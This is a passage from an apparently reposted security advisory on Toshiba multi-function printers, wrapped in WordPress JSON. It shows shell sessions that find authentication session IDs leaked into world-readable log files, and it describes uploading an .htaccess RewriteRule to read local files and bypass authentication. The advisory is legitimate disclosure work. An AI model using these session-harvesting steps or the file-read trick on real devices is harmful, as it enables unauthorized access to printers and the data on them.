`\/ramdisk\/work\/log` directory with<br \/>insecure permissions. We can find the authentication sessions (e.g.<br \/>`ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e`) inside.<\/p>\n<p>Leak of sessions inside the log files:<\/p>\n<p>bash-4.1# pwd<br \/>\/work\/log<br \/>bash-4.1# grep -r &#8216;10.0.0.2\\.&#8217; *<br \/>[&#8230;].\/log\/al\/boserverEvent.log.26.txt:&lt;Evt&gt;&lt;t&gt;05\/30<br \/>15:50:21222835&lt;\/t&gt;&lt;Session<br \/>&#8220;timerReset&#8221;&gt;&lt;id&gt;ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e&lt;\/id&gt;&lt;num&gt;658&lt;\/num&gt;&lt;pID&gt;2670&lt;\/pID&gt;&lt;pName&gt;alappmanager&lt;\/pName&gt;&lt;newTimerValue&gt;0&lt;\/newTimerValue&gt;&lt;\/Session&gt;&lt;\/Evt&gt;<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:05535294 Pid= 1657,Tid=<br \/>1784,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command<br \/>&#8216;GetSettings&#8217; from Plugin to &#8216;httpd&#8217; in<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:05552743 Pid= 1657,Tid=<br \/>1783,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command<br \/>&#8216;LicenseEnableCheck&#8217; from &#8216;httpd&#8217; to Plugin &#8216;LicenseMgmt-0x9f&#8217; with<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:05556758 Pid= 1657,Tid=<br \/>1785,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command<br \/>&#8216;LicenseEnableCheck&#8217; from Plugin to &#8216;httpd&#8217; in<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:14741108 Pid= 1657,Tid=<br \/>1784,cborepository.cpp: 4816:WRN:DELIVERCMD: Delegating Command<br \/>&#8216;LicenseEnableCheck&#8217; from &#8216;httpd&#8217; to Plugin &#8216;LicenseMgmt-0x9f&#8217; with<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/boserver.log.0.txt:05\/30 15:50:14745065 Pid= 1657,Tid=<br \/>1783,cborepository.cpp: 5340:WRN:HANDLECMD_RES: Response of Command<br \/>&#8216;LicenseEnableCheck&#8217; from Plugin to &#8216;httpd&#8217; in<br \/>SessionID(ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e).<br \/>.\/log\/al\/aldeviceconfig.log.0.txt: * SessionID :<br \/>ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>.\/log\/al\/aldeviceconfig.log.0.txt: * DeltaDocName :<br \/>hdb:\/ramdisk\/al\/tmp\/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e\/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>[&#8230;].\/log\/al\/aldeviceconfig.log.0.txt: * DeltaDocName :<br \/>hdb:\/ramdisk\/al\/tmp\/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e\/DiagnosticModeTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>.\/log\/al\/sapp\/python_settingapp.log:03\/16 20:57:34966 Pid= 5653<br \/>Tid= 1820326768 tweens.py 176 WARNING Add session map. key =<br \/>ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value =<br \/>ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7<br \/>.\/log\/al\/sapp\/python_settingapp.log:03\/16 21:08:35016 Pid= 5653<br \/>Tid= 1675623280 tweens.py 347 WARNING Delete session map. key =<br \/>ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7 value =<br \/>ContentWebServer_10.0.0.2.fc4db19cc6c8eba31abca23ece735dd7, length1<br \/>.\/log\/al\/authplugin.log.0.txt:05\/30 15:16:07935854 Pid=<br \/>1872,UserAuthManger.cpp:11476:ERR:delta Doc<br \/>Name::hdb:\/ramdisk\/al\/tmp\/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e\/AuthenticationTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>[&#8230;].\/log\/al\/renderer.log.1.txt:05\/30 20:21:13780508 Pid= 1992,Tid=<br \/>2939,LegacyPanel\/src\/cpanelmanager.cpp: 2983:WRN:Rcv ST : 72 :<br \/>1c000001 : &lt;?xml version=&#8221;1.0&#8243;<br \/>encoding=&#8221;UTF-8&#8243;?&gt;&lt;Notification&gt;&lt;Payload<br \/>model=&#8221;pull&#8221;&gt;&lt;path&gt;SecurityConfiguration\/SecuritySettings\/isLoginReqd&lt;\/path&gt;&lt;sessionID&gt;ContentWebServer_10.0.0.2.ab52ced8304357f2b382460bbdd797dc&lt;\/sessionID&gt;&lt;subscriptionID&gt;1275&lt;\/subscriptionID&gt;&lt;\/Payload&gt;&lt;\/Notification&gt;<br \/>[&#8230;]\/log\/al\/prm.log.0.txt:05\/30 15:18:16563007 Pid= 1885,Tid=<br \/>2163,manager.cpp: 1874:ERR:Delta Document<br \/>hdb:\/ramdisk\/al\/tmp\/ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e\/PresentationResourcesTransactionDoc_ContentWebServer_10.0.0.2.f5fc067bb786772b6815cf972565414e<br \/>could not be opened. Creating it<\/p>\n<p>We can list the files containing such authentication sessions:<\/p>\n<p>&#8211; &#8211; log\/al\/aldeviceconfig.log.0.txt<br \/>&#8211; &#8211; log\/al\/appmanager.log.0.txt<br \/>&#8211; &#8211; log\/al\/appmanagerlibrary.log.0.txt<br \/>&#8211; &#8211; log\/al\/authplugin.log.0.txt<br \/>&#8211; &#8211; log\/al\/boserver.log.0.txt<br \/>&#8211; &#8211; log\/al\/boserverEvent.log.26.txt<br \/>&#8211; &#8211; log\/al\/epfx\/eprocessframework.log.0.txt<br \/>&#8211; &#8211; log\/al\/prm.log.0.txt<br \/>&#8211; &#8211; log\/al\/renderer.log.0.txt<br \/>&#8211; &#8211; log\/al\/renderer.log.1.txt<br \/>&#8211; &#8211; log\/al\/renderer.log.2.txt<br \/>&#8211; &#8211; log\/al\/sapp\/python_settingapp.log<br \/>&#8211; &#8211; log\/al\/webpanel\/eapi.log.0.txt<\/p>\n<p>Using the shell:<\/p>\n<p>bash-4.1# grep -r &#8216;10.0.0.2\\.&#8217; * | sed -e &#8216;s#:# #&#8217; | awk &#8216;{ print<br \/>$1 }&#8217; | sort | uniq<br \/>log\/al\/aldeviceconfig.log.0.txt<br \/>log\/al\/appmanager.log.0.txt<br \/>log\/al\/appmanagerlibrary.log.0.txt<br \/>log\/al\/authplugin.log.0.txt<br \/>log\/al\/boserver.log.0.txt<br \/>log\/al\/boserverEvent.log.26.txt<br \/>log\/al\/epfx\/eprocessframework.log.0.txt<br \/>log\/al\/prm.log.0.txt<br \/>log\/al\/renderer.log.0.txt<br \/>log\/al\/renderer.log.1.txt<br \/>log\/al\/renderer.log.2.txt<br \/>log\/al\/sapp\/python_settingapp.log<br \/>log\/al\/webpanel\/eapi.log.0.txt<br \/>log\/al\/webpanel\/python_ta.log<\/p>\n<p>These files have insecure permissions allowing any user to retrieve<br \/>the passwords, and some files can be freely modified by any local<br \/>attacker (or any remote attacker using the Pre-authenticated Remote<br \/>Code Execution as root or apache and multiple Local Privilege<br \/>Escalations vulnerability):<\/p>\n<p>Insecure permissions for log files:<\/p>\n<p>bash-4.1# for i in $(grep -r &#8216;10.0.0.2\\.&#8217; * | sed -e &#8216;s#:# #&#8217; |<br \/>awk &#8216;{ print $1 }&#8217; | sort | uniq); do ls -la $i;done<br \/>-rw-r&#8211;r&#8211; 1 apache trusted 177116 May 30 15:51<br \/>log\/al\/aldeviceconfig.log.0.txt<br \/>-rw-r&#8211;r&#8211; 1 apache trusted 57508 May 30 15:51 log\/al\/appmanager.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 285227 May 30 16:15<br \/>log\/al\/appmanagerlibrary.log.0.txt<br \/>-rw-r&#8211;r&#8211; 1 apache trusted 8839 May 30 15:51 log\/al\/authplugin.log.0.txt<br \/>-rw-r&#8211;r&#8211; 1 apache trusted 57082 May 30 15:51 log\/al\/boserver.log.0.txt<br \/>-rwxr-xr-x 1 apache trusted 850786 May 30 15:51<br \/>log\/al\/boserverEvent.log.26.txt<br \/>-rwxr-xr-x 1 apache trusted 18608 May 30 15:51<br \/>log\/al\/epfx\/eprocessframework.log.0.txt<br \/>-rw-r&#8211;r&#8211; 1 apache trusted 18151 May 30 15:51 log\/al\/prm.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 1048682 May 30 19:28 log\/al\/renderer.log.0.txt<br \/>-rwxrwxrwx 1 root trusted 1048606 May 30 21:50 log\/al\/renderer.log.1.txt<br \/>-rw-r&#8211;r&#8211; 1 apache trusted 527501 May 30 15:51 log\/al\/renderer.log.2.txt<br \/>-rwxrwxrwx 1 apache trusted 1958 May 30 21:08<br \/>log\/al\/sapp\/python_settingapp.log<br \/>-rwxrwxrwx 1 root trusted 669880 May 30 16:15 log\/al\/webpanel\/eapi.log.0.txt<br \/>-rwxrwxrwx 1 apache trusted 311373 May 30 15:53<br \/>log\/al\/webpanel\/python_ta.log<\/p>\n<p>An attacker can retrieve authentication sessions.<\/p>\n<p>A remote attacker can retrieve the credentials and bypass the<br \/>authentication mechanism by uploading a .htaccess file containing a<br \/>RewriteRule (`RewriteRule \/pwned.txt file:\/path\/to\/local\/file`), using<br \/>the Pre-authenticated Remote Code Execution as root or apache and<br \/>multiple Local Privilege Escalations vulnerability.<\/p>\n<p>## Details &#8211; Leak of authentication sessions in insecure logs in<br \/>\/ramdisk\/al\/network\/log directory<\/p>\n<p>It was observed that the sessions are stored in clear-text logs. These<br \/>logs are world-readable and some can also be freely modified by any<br \/>local attacker.<\/p>\n<p>Some logs are stored inside the `\/ramdisk\/al\/network\/log` directory<br \/>with insecure permissions. We can find the authentication sessions<br \/>inside:<\/p>\n<p>bash-4.1# pwd<br \/>\/ramdisk\/al\/network\/log<br \/>bash-4.1# ls -la<br \/>total 184<br \/>drwxr-xr-x 6 root root 0 May 30 10:38 .<br \/>drwxr-xr-x 7 root root 0 May 30 10:39 ..<br \/>-rw-rw-rw- 1 root trusted 1455 May 30 10:38 dibbler-client.log<br \/>-rw-rw-rw- 1 root trusted 23051 May 30 16:48 hp9100.log.0.txt<br \/>-rw-rw-rw- 1 root trusted 58886 May 30 17:29 http.log<br \/>-rw-rw-rw- 1 root trusted 6143 May 30 17:29 http_access.log<br \/>-rw-rw-rw- 1 root trusted 9194 May 30 14:08 https.log<br \/>-rw-rw-rw- 1 root trusted 962 May 30 15:01 lprng.log.0.txt<br \/>-rw-r&#8212;&#8211; 1 root adm 8767 May 30 16:38 maillog<br \/>-rw-rw-rw- 1 root trusted 58619 May 30 17:23 nqlog.log<br \/>drwxrwxrwx 2 root trusted 0 May 30 10:38 wsd<br \/>drwxrwxrwx 2 root trusted 0 May 30 10:38 wsm<br \/>drwxrwxrwx 2 root trusted 0 May 30 10:38 wsp<br \/>drwxrwxrwx 2 root trusted 0 May 30 10:38 wsscn<br \/>bash-4.1# grep SessionID *<br \/>http.log:[Thu May 30 17:29:08.209477 2023][contentwebserver:debug] [pid 5113] ccontentwebserver.cpp(1130):<br \/>[client 10.0.0.2:43384] CContentWebServer::<br \/>SessionID=[ContentWebServer_10.0.0.2.874eef7e817c9d053cbdc618d850ab61]ignoreSessionTimeout=[IgnoreSessionTimeout], referer:<br \/>http:\/\/10.0.0.1:8080\/<br \/>http.log:[Thu May 30 17:29:08.739761 2023][contentwebserver:debug] [pid 5118] ccontentwebserver.cpp(1130):<br \/>[client 10.0.0.2:43386] CContentWebServer::<br \/>SessionID=[ContentWebServer_10.0.0.2.874eef7e817c9d053cbdc618d850ab61]ignoreSessionTimeout=[IgnoreSessionTimeout], referer:<br \/>http:\/\/10.0.0.1:8080\/FrameIndex.html?v=1670282309ta<br \/>[&#8230;]bash-4.1# grep -i cookie *<br \/>http.log:Utility::GetCookie sCookievalue=[]http.log:[Thu May 30 12:49:00.729591 2023][contentwebserver:error] [pid 5121] [client 10.0.0.2:50619][utility.cpp : 563] In SetCookie:: NO cookieInfo sent<br \/>http.log:[Thu May 30 12:49:00.729632 2023][contentwebserver:error] [pid 5121] [client 10.0.0.2:50619][utility.cpp : 594] In SetCookie::cookiebuf<br \/>10.0.0.2.289d834d7086d004ce9a710590e10be1<br \/>http.log: Utility::GetCookie cookieName=[Session]http.log:Utility::GetCookie sCookievalue=[]http.log:[Thu May 30 14:08:17.935840 2023]\n","protected":false},"excerpt":{"rendered":"<p>Hello, Please find a text-only version below sent to security mailing lists. The complete version on &#8220;40 vulnerabilities in Toshiba Multi-FunctionPrinters&#8221; is posted here:https:\/\/pierrekim.github.io\/blog\/2024-06-27-toshiba-mfp-40-vulnerabilities.html The text version is also posted here:https:\/\/pierrekim.github.io\/advisories\/2024-toshiba-mfp.txt === text-version of the advisory === &#8212;&#8211;BEGIN PGP SIGNED MESSAGE&#8212;&#8211;Hash: SHA512 ## Advisory Information Title: 40 vulnerabilities in Toshiba Multi-Function PrintersAdvisory URL: https:\/\/pierrekim.github.io\/advisories\/2024-toshiba-mfp.txtBlog URL: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57884","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57884","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57884"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57884\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57884"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57884"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57884"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}